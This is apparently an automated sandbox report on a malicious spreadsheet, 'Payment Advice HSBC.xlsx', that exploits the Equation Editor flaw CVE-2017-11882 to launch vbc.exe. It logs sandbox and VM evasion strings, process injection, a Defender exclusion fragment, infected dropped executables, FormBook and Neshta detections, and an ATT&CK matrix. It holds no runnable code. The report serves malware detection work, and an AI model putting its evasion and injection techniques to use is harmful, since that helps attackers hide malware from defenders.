Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM3

Show sources

Source: Yara match	File source: 00000004.00000002.472098761.000000000281B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.471972955.00000000027B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 1624, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: vbc.exe, 00000004.00000002.472098761.000000000281B000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.471972955.00000000027B1000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: vbc.exe, 00000004.00000002.472098761.000000000281B000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.471972955.00000000027B1000.00000004.00000001.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1344	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1876	Thread sleep time: -38127s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1892	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\MSOCache\All Users\{90140000-003D-0000-1000-0000000FF1CE}-C\setup.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\ProgramData\Package Cache\{e2803110-78b3-4664-a479-3611a381656a}\VC_redist.x86.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.135\Installer\setup.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Chrome\Application\chrome_proxy.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.135\elevation_service.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdateCore.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Mozilla Firefox\updater.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\Windows\svchost.com	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Mozilla Firefox\uninstall\helper.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Install\{FCE087CB-E39B-4153-8CDB-9F0ACA90F73B}\GoogleUpdateSetup.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdateComRegisterShell64.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\ProgramData\Oracle\Java\javapath_target_415196\java.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Mozilla Firefox\wow_helper.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinDirStat\windirstat.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Mozilla Firefox\maintenanceservice.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleCrashHandler.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.135\Installer\chrmstp.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Uninstall.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleCrashHandler64.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinDirStat\Uninstall.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\ProgramData\Package Cache\{f65db027-aff3-4070-886a-0d87064aabb1}\vcredist_x86.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\ProgramData\Oracle\Java\javapath_target_415196\javaws.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.135\notification_helper.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdate.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdateOnDemand.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\ProgramData\Oracle\Java\javapath_target_415196\javaw.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Mozilla Firefox\plugin-container.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\ProgramData\Package Cache\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\VC_redist.x64.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Download\{430FD4D0-B729-4F61-AA34-91526481799D}\1.3.36.102\GoogleUpdateSetup.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Mozilla Firefox\minidump-analyzer.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.135\chrome_pwa_launcher.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\MSOCache\All Users\{90140000-003D-0000-1000-0000000FF1CE}-C\ose.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Mozilla Firefox\firefox.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Mozilla Firefox\maintenanceservice_installer.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Mozilla Firefox\crashreporter.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdateSetup.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdateBroker.exe	Jump to dropped file

Source: C:\Users\Public\vbc.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\Public\vbc.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\Public\vbc.exe	Code function: 5_2_00405080 FindFirstFileA,FindNextFileA,FindClose,	5_2_00405080
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00405634 FindFirstFileA,FindNextFileA,FindClose,	5_2_00405634
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00404F6C FindFirstFileA,FindClose,	5_2_00404F6C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004056A7 FindFirstFileA,FindNextFileA,FindClose,	5_2_004056A7

Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 38127			Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 5_2_00406D40 GetLogicalDriveStringsA,GetDriveTypeA,GetDriveTypeA,

5_2_00406D40

Source: C:\Users\Public\vbc.exe	File opened: C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\14\BIN\1033\	Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\14\BIN\	Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: C:\Program Files\Common Files\Microsoft Shared\Web Folders\	Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: C:\Program Files\Common Files\Microsoft Shared\Web Folders\1033\	Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\	Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\14\	Jump to behavior

Source: vbc.exe, 00000004.00000002.471972955.00000000027B1000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
Source: vbc.exe, 00000005.00000003.590497736.00000000041E4000.00000004.00000001.sdmp	Binary or memory string: C:\Windows\winsxs\amd64_microsoft-windows-m..eplacementmanifests_31bf3856ad364e35_6.1.7601.17514_none_5a1a617d021715d4\microsoft-hyper-v-migration-replacement.man
Source: vbc.exe, 00000005.00000003.590497736.00000000041E4000.00000004.00000001.sdmp	Binary or memory string: microsoft-hyper-v-migration-replacement.man
Source: vbc.exe, 00000004.00000002.471972955.00000000027B1000.00000004.00000001.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000005.00000003.566737357.0000000000960000.00000004.00000001.sdmp	Binary or memory string: .amd64_microsoft-hyper-v-drivers-vmswitch_31bf3856ad364e35_6.1.7601.23677_none_c77ccf83b0083969.manifestifest@
Source: vbc.exe, 00000004.00000002.471972955.00000000027B1000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: vbc.exe, 00000005.00000003.590497736.00000000041E4000.00000004.00000001.sdmp	Binary or memory string: .microsoft-hyper-v-drivers-migration-replacement.mannt-Replacement.man@
Source: vbc.exe, 00000005.00000003.590497736.00000000041E4000.00000004.00000001.sdmp	Binary or memory string: microsoft-hyper-v-migration-replacement.
Source: vbc.exe, 00000005.00000003.590497736.00000000041E4000.00000004.00000001.sdmp	Binary or memory string: 5_6.1.7601.17514_none_5a1a617d021715d4\microsoft-hyper-v-drivers-migration-replacement.m
Source: vbc.exe, 00000005.00000003.581083188.0000000000998000.00000004.00000001.sdmp	Binary or memory string: $.microsoft-hyper-v-client-migration-replacement.mannt-Replacement.man@
Source: vbc.exe, 00000005.00000003.590497736.00000000041E4000.00000004.00000001.sdmp, vbc.exe, 00000005.00000003.581083188.0000000000998000.00000004.00000001.sdmp	Binary or memory string: microsoft-hyper-v-client-migration-replacement.man
Source: vbc.exe, 00000005.00000003.590497736.00000000041E4000.00000004.00000001.sdmp	Binary or memory string: microsoft-hyper-v-drivers-migration-replacement.man
Source: vbc.exe, 00000005.00000003.566737357.0000000000960000.00000004.00000001.sdmp	Binary or memory string: amd64_microsoft-hyper-v-d..switch-forceproject_31bf3856ad364e35_6.1.7601.23677_none_d4dd436f4654a5d0.manifest
Source: vbc.exe, 00000005.00000003.590497736.00000000041E4000.00000004.00000001.sdmp	Binary or memory string: ;+microsoft-hyper-v-migration-replacement.
Source: vbc.exe, 00000005.00000003.566737357.0000000000960000.00000004.00000001.sdmp	Binary or memory string: .amd64_microsoft-hyper-v-d..switch-forceproject_31bf3856ad364e35_6.1.7601.23677_none_d4dd436f4654a5d0.manifest@
Source: vbc.exe, 00000005.00000003.590497736.00000000041E4000.00000004.00000001.sdmp	Binary or memory string: .microsoft-hyper-v-client-migration-replacement.mannt-Replacement.man@
Source: vbc.exe, 00000005.00000003.566737357.0000000000960000.00000004.00000001.sdmp	Binary or memory string: amd64_microsoft-hyper-v-drivers-vmswitch_31bf3856ad364e35_6.1.7601.23677_none_c77ccf83b0083969.manifest
Source: vbc.exe, 00000005.00000003.590497736.00000000041E4000.00000004.00000001.sdmp	Binary or memory string: .microsoft-hyper-v-migration-replacement.manent.mannt-Replacement.man@
Source: vbc.exe, 00000004.00000002.471972955.00000000027B1000.00000004.00000001.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Source: C:\Users\Public\vbc.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\Public\vbc.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\Public\vbc.exe

Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe			Jump to behavior

Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\Public\vbc.exe VolumeInformation			Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation			Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: GetLocaleInfoA,

5_2_00403CB4

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 5_2_004057D8 GetLocalTime,

5_2_004057D8

Source: C:\Users\Public\vbc.exe

Code function: 5_2_00403D7D GetCommandLineA,GetVersion,GetVersion,GetThreadLocale,GetThreadLocale,GetCurrentThreadId,

5_2_00403D7D

Stealing of Sensitive Information:

Yara detected Neshta

Show sources

Source: Yara match	File source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp, type: MEMORY

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000004.00000002.472955830.000000000394E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.473024128.00000000039A1000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000004.00000002.472955830.000000000394E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.473024128.00000000039A1000.00000004.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Exploitation for Client Execution12	Registry Run Keys / Startup Folder1	Process Injection111	Masquerading331	Input Capture11	System Time Discovery1	Taint Shared Content1	Input Capture11	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Registry Run Keys / Startup Folder1	Disable or Modify Tools1	LSASS Memory	Security Software Discovery11	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion21	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection111	NTDS	Virtualization/Sandbox Evasion21	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol21	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Obfuscated Files or Information2	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Software Packing14	Cached Domain Credentials	File and Directory Discovery4	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	System Information Discovery25	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Payment Advice HSBC.xlsx	34%	Virustotal		Browse
Payment Advice HSBC.xlsx	32%	ReversingLabs	Document-Office.Exploit.CVE-2017-11882

Dropped Files

Source	Detection	Scanner
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Au3Info.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe	100%	Joe Sandbox ML
C:\MSOCache\All Users\{90140000-0115-0409-1000-0000000FF1CE}-C\dwtrig20.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe	100%	Joe Sandbox ML
C:\MSOCache\All Users\{90140000-003D-0000-1000-0000000FF1CE}-C\ose.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Uninstall.exe	100%	Joe Sandbox ML
C:\MSOCache\All Users\{90140000-003D-0000-1000-0000000FF1CE}-C\setup.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Au3Check.exe	100%	Joe Sandbox ML
C:\MSOCache\All Users\{90140000-0115-0409-1000-0000000FF1CE}-C\DW20.EXE	100%	Joe Sandbox ML
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	100%	Joe Sandbox ML
